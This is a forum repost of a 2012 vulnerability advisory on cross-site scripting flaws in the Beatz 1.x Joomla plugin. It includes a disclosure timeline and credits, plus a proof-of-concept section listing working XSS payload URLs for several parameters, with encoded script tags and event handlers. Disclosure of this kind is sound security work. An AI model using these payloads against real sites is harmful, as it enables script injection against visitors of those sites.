backdoor Posted April 18, 2012 Report Share Posted April 18, 2012 Info1. OVERVIEWBeatz 1.x versions are vulnerable to Cross Site Scripting.2. BACKGROUNDBeatz is a set of powerful Social Networking Script Joomla! 1.5plugins that allows you to start your own favourite artist bandwebsite. Although it is just a Joomla! plugin, it comes with fullJoolma! bundle for ease of use and installation.3. VULNERABILITY DESCRIPTIONMultiple parameters were not properly sanitized upon submission, whichallows attacker to conduct Cross Site Scripting attack. This may allowan attacker to create a specially crafted URL that would executearbitrary script code in a victim's browser. The vulnerable pluginsinclude: com_find, com_charts and com_videos.4. VERSIONS AFFECTEDTested in 1.x versions5. PROOF-OF-CONCEPT/EXPLOIT== Generic Joomla! 1.5 Double Encoding XSShttp://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1== com_charts (parameter: do)http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts== com_find (parameter: keyword)http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find== com_videos (parameter: video_keyword)http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search6. SOLUTIONThe vendor hasn't released the fixed yet.7. VENDORCogzidel Technologies Pvt Ltd.http://www.cogzidel.com/8. CREDITAung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.9. DISCLOSURE TIME-LINE2011-03-01: notified vendor2012-04-15: vulnerability disclosed10. REFERENCESOriginal Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss#yehg [2012-04-15]Sursa : Joomla Beatz 1.x Cross Site Scripting ? Packet Storm Quote Link to comment Share on other sites More sharing options...